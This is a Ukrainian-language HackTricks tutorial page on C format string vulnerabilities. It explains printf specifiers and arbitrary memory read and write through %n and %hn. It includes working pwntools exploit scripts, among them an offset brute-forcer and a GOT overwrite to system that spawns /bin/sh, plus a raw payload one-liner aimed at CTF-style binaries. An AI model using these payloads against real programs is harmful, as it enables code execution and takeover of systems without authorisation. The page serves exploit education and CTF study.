hacktricks/binary-exploitation/format-strings

Форматні рядки

{% hint style="success" %} Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Підтримайте HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на GitHub.

{% endhint %}

Якщо ви зацікавлені в кар'єрі в хакерстві та хочете зламати незламне - ми наймаємо! (вимагається вільне володіння польською мовою в письмовій та усній формі).

{% embed url="https://www.stmcyber.com/careers" %}

Основна інформація

У C printf - це функція, яка може бути використана для виведення деякого рядка. Перший параметр, який очікує ця функція, - це сирий текст з форматерами. Наступні параметри - це значення, які потрібно замінити на форматери з сирого тексту.

Інші вразливі функції - це sprintf() та fprintf().

Вразливість виникає, коли текст зловмисника використовується як перший аргумент для цієї функції. Зловмисник зможе створити спеціальний вхід, зловживаючи можливостями формату printf для читання та запису будь-яких даних за будь-якою адресою (читабельною/записуваною). Таким чином, він зможе виконувати довільний код.

Форматери:

%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3

Приклади:

• Вразливий приклад:

char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.

• Звичайне використання:

int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5

• З відсутніми аргументами:

printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.

• fprintf вразливий:

#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}

Доступ до вказівників

Формат %<n>$x, де n - це число, дозволяє вказати printf вибрати n параметр (з стеку). Тож, якщо ви хочете прочитати 4-й параметр зі стеку, використовуючи printf, ви можете зробити:

printf("%x %x %x %x")

і ви б читали з першого до четвертого параметра.

Або ви могли б зробити:

printf("%4$x")

і безпосередньо прочитати четвертий.

Зверніть увагу, що атакуючий контролює параметр printf, що в основному означає, що його введення буде в стеку, коли викликається printf, що означає, що він може записувати конкретні адреси пам'яті в стек.

{% hint style="danger" %} Атакуючий, що контролює цей ввід, зможе додати довільну адресу в стек і змусити printf отримати доступ до них. У наступному розділі буде пояснено, як використовувати цю поведінку. {% endhint %}

Довільне Читання

Можливо використовувати форматер %n$s, щоб змусити printf отримати адресу, що знаходиться на n позиції, слідуючи за ним, і друкувати її так, ніби це рядок (друкувати до тих пір, поки не буде знайдено 0x00). Отже, якщо базова адреса бінарного файлу 0x8048000, і ми знаємо, що введення користувача починається на 4-й позиції в стеці, можливо надрукувати початок бінарного файлу за допомогою:

from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'

{% hint style="danger" %} Зверніть увагу, що ви не можете поставити адресу 0x8048000 на початку введення, оскільки рядок буде обірвано на 0x00 в кінці цієї адреси. {% endhint %}

Знайти зсув

Щоб знайти зсув до вашого введення, ви можете надіслати 4 або 8 байтів (0x41414141), за якими слідує %1$x і збільшувати значення, поки не отримаєте A's.

Брутфорс зсуву printf

```python # Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

Iterate over a range of integers

for i in range(10):

Construct a payload that includes the current integer as offset

payload = f"AAAA%{i}$x".encode()

Start a new process of the "chall" binary

p = process("./chall")

Send the payload to the process

p.sendline(payload)

Read and store the output of the process

output = p.clean()

Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output

if b"41414141" in output:

If the string is found, log the success message and break out of the loop

log.success(f"User input is at offset : {i}") break

Close the process

p.close()

</details>

### Як корисно

Випадкові читання можуть бути корисними для:

* **Вивантаження** **бінарного** файлу з пам'яті
* **Доступу до конкретних частин пам'яті, де зберігається чутлива** **інформація** (як-от канарейки, ключі шифрування або користувацькі паролі, як у цьому [**CTF виклику**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value))

## **Випадкове записування**

Форматер **`%<num>$n`** **записує** **кількість записаних байтів** у **вказану адресу** в параметрі \<num> у стеку. Якщо зловмисник може записати стільки символів, скільки захоче, використовуючи printf, він зможе змусити **`%<num>$n`** записати випадкове число в випадкову адресу.

На щастя, щоб записати число 9999, не потрібно додавати 9999 "A" до введення, для цього можна використовувати форматер **`%.<num-write>%<num>$n`**, щоб записати число **`<num-write>`** у **адресу, на яку вказує позиція `num`**.
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500

Однак, зверніть увагу, що зазвичай для запису адреси, такої як 0x08049724 (що є ВЕЛИЧЕЗНИМ числом для запису одночасно), використовується $hn замість $n. Це дозволяє записати лише 2 байти. Тому ця операція виконується двічі: один раз для найвищих 2B адреси і ще раз для найнижчих.

Отже, ця вразливість дозволяє записувати що завгодно в будь-яку адресу (произвольний запис).

У цьому прикладі метою буде перезаписати адресу функції в таблиці GOT, яка буде викликана пізніше. Хоча це може зловживати іншими техніками произвольного запису для виконання:

{% content-ref url="../arbitrary-write-2-exec/" %} arbitrary-write-2-exec {% endcontent-ref %}

Ми будемо перезаписувати функцію, яка отримує свої аргументи від користувача і вказує на функцію system.
Як згадувалося, для запису адреси зазвичай потрібно 2 кроки: спочатку записується 2 байти адреси, а потім інші 2. Для цього використовується $hn.

• HOB викликається для 2 вищих байтів адреси
• LOB викликається для 2 нижчих байтів адреси

Потім, через те, як працює формат рядка, вам потрібно спочатку записати найменший з [HOB, LOB], а потім інший.

Якщо HOB < LOB
[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]

Якщо HOB > LOB
[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB

{% code overflow="wrap" %}

python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'

{% endcode %}

Pwntools Шаблон

Ви можете знайти шаблон для підготовки експлойту для цього типу вразливості в:

{% content-ref url="format-strings-template.md" %} format-strings-template.md {% endcontent-ref %}

Або цей базовий приклад з тут:

from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()

Форматні рядки до BOF

Можливо зловживати діями запису вразливості форматного рядка, щоб записувати в адреси стеку та експлуатувати вразливість типу переповнення буфера.

Інші приклади та посилання

• https://ir0nstone.gitbook.io/notes/types/stack/format-string
• https://www.youtube.com/watch?v=t1LH9D5cuK4
• https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak
• https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html
• 32 біт, без relro, без canary, nx, без pie, базове використання форматних рядків для витоку прапора зі стеку (немає потреби змінювати потік виконання)
• https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html
• 32 біт, relro, без canary, nx, без pie, форматний рядок для перезапису адреси fflush з функцією win (ret2win)
• https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html
• 32 біт, relro, без canary, nx, без pie, форматний рядок для запису адреси всередині main в .fini_array (щоб потік повертався ще раз) і запису адреси до system в таблиці GOT, що вказує на strlen. Коли потік повертається до main, strlen виконується з введенням користувача і вказує на system, він виконає передані команди.

Якщо ви зацікавлені в кар'єрі в хакерстві та хочете зламати незламне - ми наймаємо! (вимагається вільне володіння польською мовою в письмовій та усній формі).

{% embed url="https://www.stmcyber.com/careers" %}

{% hint style="success" %} Вчіться та практикуйте Hacking AWS:HackTricks Training AWS Red Team Expert (ARTE)
Вчіться та практикуйте Hacking GCP: HackTricks Training GCP Red Team Expert (GRTE)

Підтримка HackTricks

• Перевірте плани підписки!
• Приєднуйтесь до 💬 групи Discord або групи Telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
• Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github. {% endhint %}